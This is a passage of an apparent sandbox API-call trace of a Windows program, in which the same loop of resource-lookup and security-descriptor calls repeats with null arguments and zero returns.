dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.990] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.990] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.990] LockResource (hResData=0x0) returned 0x0 [0219.990] FreeResource (hResData=0x0) returned 0 [0219.990] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.990] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.990] LockResource (hResData=0x0) returned 0x0 [0219.990] FreeResource (hResData=0x0) returned 0 [0219.990] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.990] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.990] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.990] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.990] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.990] LockResource (hResData=0x0) returned 0x0 [0219.990] FreeResource (hResData=0x0) returned 0 [0219.991] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.991] LockResource (hResData=0x0) returned 0x0 [0219.991] FreeResource (hResData=0x0) returned 0 [0219.991] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.991] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.991] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.991] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.991] LockResource (hResData=0x0) returned 0x0 [0219.991] FreeResource (hResData=0x0) returned 0 [0219.991] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.991] LockResource (hResData=0x0) returned 0x0 [0219.991] FreeResource (hResData=0x0) returned 0 [0219.991] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.991] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.991] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.991] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.991] LockResource (hResData=0x0) returned 0x0 [0219.991] FreeResource (hResData=0x0) returned 0 [0219.991] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.991] LockResource (hResData=0x0) returned 0x0 [0219.991] FreeResource (hResData=0x0) returned 0 [0219.991] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.991] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.991] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.991] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.991] LockResource (hResData=0x0) returned 0x0 [0219.991] FreeResource (hResData=0x0) returned 0 [0219.991] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.991] LockResource (hResData=0x0) returned 0x0 [0219.991] FreeResource (hResData=0x0) returned 0 [0219.992] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.992] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.992] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.992] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.992] LockResource (hResData=0x0) returned 0x0 [0219.992] FreeResource (hResData=0x0) returned 0 [0219.992] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.992] LockResource (hResData=0x0) returned 0x0 [0219.992] FreeResource (hResData=0x0) returned 0 [0219.992] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.992] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.992] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.992] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.992] LockResource (hResData=0x0) returned 0x0 [0219.992] FreeResource (hResData=0x0) returned 0 [0219.992] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.992] LockResource (hResData=0x0) returned 0x0 [0219.992] FreeResource (hResData=0x0) returned 0 [0219.992] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.992] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.992] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.992] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.992] LockResource (hResData=0x0) returned 0x0 [0219.992] FreeResource (hResData=0x0) returned 0 [0219.992] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.992] LockResource (hResData=0x0) returned 0x0 [0219.992] FreeResource (hResData=0x0) returned 0 [0219.992] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.992] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.992] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.992] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.993] LockResource (hResData=0x0) returned 0x0 [0219.993] FreeResource (hResData=0x0) returned 0 [0219.993] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.993] LockResource (hResData=0x0) returned 0x0 [0219.993] FreeResource (hResData=0x0) returned 0 [0219.993] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.993] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.993] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.993] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.993] LockResource (hResData=0x0) returned 0x0 [0219.993] FreeResource (hResData=0x0) returned 0 [0219.993] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.993] LockResource (hResData=0x0) returned 0x0 [0219.993] FreeResource (hResData=0x0) returned 0 [0219.993] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.993] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.993] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.993] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.993] LockResource (hResData=0x0) returned 0x0 [0219.993] FreeResource (hResData=0x0) returned 0 [0219.993] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.993] LockResource (hResData=0x0) returned 0x0 [0219.993] FreeResource (hResData=0x0) returned 0 [0219.993] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.993] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.993] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.993] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.993] LockResource (hResData=0x0) returned 0x0 [0219.993] FreeResource (hResData=0x0) returned 0 [0219.993] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.994] LockResource (hResData=0x0) returned 0x0 [0219.994] FreeResource (hResData=0x0) returned 0 [0219.994] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.994] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.994] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.994] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.994] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.994] LockResource (hResData=0x0) returned 0x0 [0219.994] FreeResource (hResData=0x0) returned 0 [0219.994] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.994] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.994] LockResource (hResData=0x0) returned 0x0 [0219.994] FreeResource (hResData=0x0) returned 0 [0219.994] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.994] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.994] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.994] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.994] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.994] LockResource (hResData=0x0) returned 0x0 [0219.994] FreeResource (hResData=0x0) returned 0 [0219.994] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.994] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.994] LockResource (hResData=0x0) returned 0x0 [0219.994] FreeResource (hResData=0x0) returned 0 [0219.994] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.994] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.994] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.994] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.994] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.994] LockResource (hResData=0x0) returned 0x0 [0219.994] FreeResource (hResData=0x0) returned 0 [0219.994] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.994] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.994] LockResource (hResData=0x0) returned 0x0 [0219.994] FreeResource (hResData=0x0) returned 0 [0219.994] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.994] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.994] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.995] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.995] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.995] LockResource (hResData=0x0) returned 0x0 [0219.995] FreeResource (hResData=0x0) returned 0 [0219.995] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.995] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.995] LockResource (hResData=0x0) returned 0x0 [0219.995] FreeResource (hResData=0x0) returned 0 [0219.995] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.995] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.995] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.995] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.995] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.995] LockResource (hResData=0x0) returned 0x0 [0219.995] FreeResource (hResData=0x0) returned 0 [0219.995] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.995] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.995] LockResource (hResData=0x0) returned 0x0 [0219.995] FreeResource (hResData=0x0) returned 0 [0219.995] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.995] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.995] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.995] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.995] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.995] LockResource (hResData=0x0) returned 0x0 [0219.995] FreeResource (hResData=0x0) returned 0 [0219.995] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.995] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.995] LockResource (hResData=0x0) returned 0x0 [0219.995] FreeResource (hResData=0x0) returned 0 [0219.995] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.995] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.995] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.995] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.995] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.995] LockResource (hResData=0x0) returned 0x0 [0219.995] FreeResource (hResData=0x0) returned 0 [0219.996] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.996] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.996] LockResource (hResData=0x0) returned 0x0 [0219.996] FreeResource (hResData=0x0) returned 0 [0219.996] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.996] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.996] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.996] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.996] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.996] LockResource (hResData=0x0) returned 0x0 [0219.996] FreeResource (hResData=0x0) returned 0 [0219.996] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.996] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.996] LockResource (hResData=0x0) returned 0x0 [0219.996] FreeResource (hResData=0x0) returned 0 [0219.996] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.996] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.996] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.996] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.996] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.996] LockResource (hResData=0x0) returned 0x0 [0219.996] FreeResource (hResData=0x0) returned 0 [0219.996] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.996] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.996] LockResource (hResData=0x0) returned 0x0 [0219.996] FreeResource (hResData=0x0) returned 0 [0219.996] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.996] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.996] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.996] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.996] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.996] LockResource (hResData=0x0) returned 0x0 [0219.996] FreeResource (hResData=0x0) returned 0 [0219.996] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.996] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.996] LockResource (hResData=0x0) returned 0x0 [0219.996] FreeResource (hResData=0x0) returned 0 [0219.997] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.997] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.997] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.997] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.997] LockResource (hResData=0x0) returned 0x0 [0219.997] FreeResource (hResData=0x0) returned 0 [0219.997] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.997] LockResource (hResData=0x0) returned 0x0 [0219.997] FreeResource (hResData=0x0) returned 0 [0219.997] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.997] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.997] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.997] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.997] LockResource (hResData=0x0) returned 0x0 [0219.997] FreeResource (hResData=0x0) returned 0 [0219.997] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.997] LockResource (hResData=0x0) returned 0x0 [0219.997] FreeResource (hResData=0x0) returned 0 [0219.997] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.997] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.997] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.997] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.997] LockResource (hResData=0x0) returned 0x0 [0219.997] FreeResource (hResData=0x0) returned 0 [0219.997] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.997] LockResource (hResData=0x0) returned 0x0 [0219.997] FreeResource (hResData=0x0) returned 0 [0219.997] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.997] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.997] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.997] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.998] LockResource (hResData=0x0) returned 0x0 [0219.998] FreeResource (hResData=0x0) returned 0 [0219.998] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.998] LockResource (hResData=0x0) returned 0x0 [0219.998] FreeResource (hResData=0x0) returned 0 [0219.998] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.998] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.998] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.998] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 